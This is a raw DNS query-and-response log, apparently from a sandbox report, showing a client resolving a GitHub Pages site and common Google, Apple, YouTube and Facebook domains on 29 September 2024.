                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.742484093 CEST192.168.2.61.1.1.10x40f7Standard query (0)is1-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.746151924 CEST192.168.2.61.1.1.10x5ae8Standard query (0)is1-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.746865034 CEST192.168.2.61.1.1.10x7e57Standard query (0)is2-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.747010946 CEST192.168.2.61.1.1.10x4a5dStandard query (0)is2-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.767438889 CEST192.168.2.61.1.1.10xcaf0Standard query (0)is5-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.767736912 CEST192.168.2.61.1.1.10x6d66Standard query (0)is5-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.778383970 CEST192.168.2.61.1.1.10x5c89Standard query (0)is4-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.778603077 CEST192.168.2.61.1.1.10x296dStandard query (0)is4-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.780015945 CEST192.168.2.61.1.1.10xc455Standard query (0)is3-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.780180931 CEST192.168.2.61.1.1.10x427eStandard query (0)is3-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:31.022459984 CEST192.168.2.61.1.1.10xbe82Standard query (0)is1-ssl.mzstatic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:31.023017883 CEST192.168.2.61.1.1.10x9cc0Standard query (0)is1-ssl.mzstatic.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:42.131097078 CEST192.168.2.61.1.1.10x4d72Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:42.131567001 CEST192.168.2.61.1.1.10x8e7fStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:43.960800886 CEST192.168.2.61.1.1.10xdbccStandard query (0)play-lh.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:43.960942030 CEST192.168.2.61.1.1.10xcaccStandard query (0)play-lh.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:45.646533966 CEST192.168.2.61.1.1.10x40b7Standard query (0)play-lh.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:45.646801949 CEST192.168.2.61.1.1.10x8e36Standard query (0)play-lh.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:51.113569021 CEST192.168.2.61.1.1.10xc358Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:51.113704920 CEST192.168.2.61.1.1.10xc0eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:53.773787022 CEST192.168.2.61.1.1.10x334cStandard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:53.773963928 CEST192.168.2.61.1.1.10xad2aStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:15.653286934 CEST192.168.2.61.1.1.10xe2c0Standard query (0)static.xx.fbcdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:15.653373003 CEST192.168.2.61.1.1.10x9656Standard query (0)static.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.245419979 CEST192.168.2.61.1.1.10x9a22Standard query (0)i.ytimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.246139050 CEST192.168.2.61.1.1.10x4c91Standard query (0)i.ytimg.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.616478920 CEST192.168.2.61.1.1.10x3764Standard query (0)i.ytimg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.616657019 CEST192.168.2.61.1.1.10xbc8cStandard query (0)i.ytimg.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:19.632683039 CEST192.168.2.61.1.1.10xf191Standard query (0)static.xx.fbcdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:19.632841110 CEST192.168.2.61.1.1.10xc1eStandard query (0)static.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:27.575665951 CEST192.168.2.61.1.1.10xe624Standard query (0)play-games.googleusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:27.576320887 CEST192.168.2.61.1.1.10x102dStandard query (0)play-games.googleusercontent.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.029077053 CEST192.168.2.61.1.1.10x69f4Standard query (0)facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.029382944 CEST192.168.2.61.1.1.10x42fStandard query (0)facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.320817947 CEST192.168.2.61.1.1.10x33d6Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.321086884 CEST192.168.2.61.1.1.10x1745Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.746124983 CEST192.168.2.61.1.1.10xa4b5Standard query (0)facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.746287107 CEST192.168.2.61.1.1.10x34a6Standard query (0)facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.809478998 CEST192.168.2.61.1.1.10xcd44Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.809676886 CEST192.168.2.61.1.1.10x7bdfStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.467678070 CEST192.168.2.61.1.1.10xff5eStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.468005896 CEST192.168.2.61.1.1.10x5343Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.671602964 CEST192.168.2.61.1.1.10xd7adStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:31.672410011 CEST192.168.2.61.1.1.10x264dStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:47.318993092 CEST192.168.2.61.1.1.10x3280Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:47.319145918 CEST192.168.2.61.1.1.10xb70fStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:53.781137943 CEST192.168.2.61.1.1.10xe538Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:53.781518936 CEST192.168.2.61.1.1.10xbedcStandard query (0)play.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:55:04.101022959 CEST192.168.2.61.1.1.10x2d48Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:55:04.101217985 CEST192.168.2.61.1.1.10x812aStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.093626976 CEST1.1.1.1192.168.2.60x8f8dNo error (0)sayidanur.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.093626976 CEST1.1.1.1192.168.2.60x8f8dNo error (0)sayidanur.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.093626976 CEST1.1.1.1192.168.2.60x8f8dNo error (0)sayidanur.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.093626976 CEST1.1.1.1192.168.2.60x8f8dNo error (0)sayidanur.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.840724945 CEST1.1.1.1192.168.2.60x1f9No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.840724945 CEST1.1.1.1192.168.2.60x1f9No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.841110945 CEST1.1.1.1192.168.2.60xe3feNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:02.622239113 CEST1.1.1.1192.168.2.60x8b59No error (0)sayidanur.github.io185.199.108.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:02.622239113 CEST1.1.1.1192.168.2.60x8b59No error (0)sayidanur.github.io185.199.109.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:02.622239113 CEST1.1.1.1192.168.2.60x8b59No error (0)sayidanur.github.io185.199.111.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:02.622239113 CEST1.1.1.1192.168.2.60x8b59No error (0)sayidanur.github.io185.199.110.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:04.300951004 CEST1.1.1.1192.168.2.60xf010No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:04.301050901 CEST1.1.1.1192.168.2.60xa356No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:12.488502979 CEST1.1.1.1192.168.2.60x1a25No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:12.488502979 CEST1.1.1.1192.168.2.60x1a25No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:14.313498020 CEST1.1.1.1192.168.2.60x89ecNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:14.313702106 CEST1.1.1.1192.168.2.60xfabNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:14.313702106 CEST1.1.1.1192.168.2.60xfabNo error (0)star-mini.c10r.facebook.com157.240.252.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:14.372284889 CEST1.1.1.1192.168.2.60x9eb5No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:14.372284889 CEST1.1.1.1192.168.2.60x9eb5No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:15.618381977 CEST1.1.1.1192.168.2.60x16aaNo error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:15.618381977 CEST1.1.1.1192.168.2.60x16aaNo error (0)scontent.xx.fbcdn.net157.240.251.9A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:15.618400097 CEST1.1.1.1192.168.2.60x821aNo error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:15.618400097 CEST1.1.1.1192.168.2.60x821aNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:15.618400097 CEST1.1.1.1192.168.2.60x821aNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.160852909 CEST1.1.1.1192.168.2.60x2139No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.160852909 CEST1.1.1.1192.168.2.60x2139No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.160852909 CEST1.1.1.1192.168.2.60x2139No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.161241055 CEST1.1.1.1192.168.2.60x540No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.161241055 CEST1.1.1.1192.168.2.60x540No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.363250017 CEST1.1.1.1192.168.2.60xeafdNo error (0)facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:18.537205935 CEST1.1.1.1192.168.2.60xd2fNo error (0)facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:23.250433922 CEST1.1.1.1192.168.2.60x2faNo error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:23.250446081 CEST1.1.1.1192.168.2.60x8460No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:23.250446081 CEST1.1.1.1192.168.2.60x8460No error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.756509066 CEST1.1.1.1192.168.2.60x40f7No error (0)is1-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.759604931 CEST1.1.1.1192.168.2.60x5ae8No error (0)is1-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.760812044 CEST1.1.1.1192.168.2.60x7e57No error (0)is2-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.760822058 CEST1.1.1.1192.168.2.60x4a5dNo error (0)is2-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.777645111 CEST1.1.1.1192.168.2.60xcaf0No error (0)is5-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.777653933 CEST1.1.1.1192.168.2.60x6d66No error (0)is5-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.798368931 CEST1.1.1.1192.168.2.60x5c89No error (0)is4-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.798391104 CEST1.1.1.1192.168.2.60x296dNo error (0)is4-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.798414946 CEST1.1.1.1192.168.2.60x427eNo error (0)is3-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:27.798424006 CEST1.1.1.1192.168.2.60xc455No error (0)is3-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:31.028997898 CEST1.1.1.1192.168.2.60xbe82No error (0)is1-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:31.029654980 CEST1.1.1.1192.168.2.60x9cc0No error (0)is1-ssl.mzstatic.comis-ssl.mzstatic.com.itunes-apple.com.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:42.142812014 CEST1.1.1.1192.168.2.60x4d72No error (0)play.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:44.009718895 CEST1.1.1.1192.168.2.60xdbccNo error (0)play-lh.googleusercontent.com216.58.212.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:45.659800053 CEST1.1.1.1192.168.2.60x40b7No error (0)play-lh.googleusercontent.com142.250.185.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:51.120595932 CEST1.1.1.1192.168.2.60xc0eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:51.120815992 CEST1.1.1.1192.168.2.60xc358No error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:52.701723099 CEST1.1.1.1192.168.2.60x7353No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:52.701723099 CEST1.1.1.1192.168.2.60x7353No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:53.780334949 CEST1.1.1.1192.168.2.60x334cNo error (0)play.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:14.530797958 CEST1.1.1.1192.168.2.60xc935No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:14.530797958 CEST1.1.1.1192.168.2.60xc935No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:15.659864902 CEST1.1.1.1192.168.2.60xe2c0No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:15.659864902 CEST1.1.1.1192.168.2.60xe2c0No error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:15.659910917 CEST1.1.1.1192.168.2.60x9656No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:15.659910917 CEST1.1.1.1192.168.2.60x9656No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:15.659910917 CEST1.1.1.1192.168.2.60x9656No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.186.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com172.217.18.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.186.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.185.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.185.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.185.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.186.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.185.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.74.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.184.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com172.217.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.185.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.181.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com216.58.206.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.186.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:17.251919985 CEST1.1.1.1192.168.2.60x9a22No error (0)i.ytimg.com142.250.184.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.184.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com172.217.16.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.186.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.186.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com172.217.18.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.185.214A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com216.58.206.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.185.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.184.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com172.217.23.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.186.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com172.217.18.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.185.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.185.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.185.118A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:18.623085976 CEST1.1.1.1192.168.2.60x3764No error (0)i.ytimg.com142.250.185.246A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:19.639195919 CEST1.1.1.1192.168.2.60xc1eNo error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:19.639195919 CEST1.1.1.1192.168.2.60xc1eNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:19.639195919 CEST1.1.1.1192.168.2.60xc1eNo error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:19.639254093 CEST1.1.1.1192.168.2.60xf191No error (0)static.xx.fbcdn.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:19.639254093 CEST1.1.1.1192.168.2.60xf191No error (0)scontent.xx.fbcdn.net157.240.0.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:27.582696915 CEST1.1.1.1192.168.2.60xe624No error (0)play-games.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:27.582696915 CEST1.1.1.1192.168.2.60xe624No error (0)googlehosted.l.googleusercontent.com142.250.184.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:27.585983038 CEST1.1.1.1192.168.2.60x102dNo error (0)play-games.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.035693884 CEST1.1.1.1192.168.2.60x69f4No error (0)facebook.com157.240.251.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.327429056 CEST1.1.1.1192.168.2.60x33d6No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.327429056 CEST1.1.1.1192.168.2.60x33d6No error (0)scontent.xx.fbcdn.net157.240.253.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.327714920 CEST1.1.1.1192.168.2.60x1745No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.327714920 CEST1.1.1.1192.168.2.60x1745No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:29.327714920 CEST1.1.1.1192.168.2.60x1745No error (0)scontent.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:54:30.752588987 CEST1.1.1.1192.168.2.60xa4b5No error (0)facebook.com157.240.0.35A (IP address)IN (0x0001)false
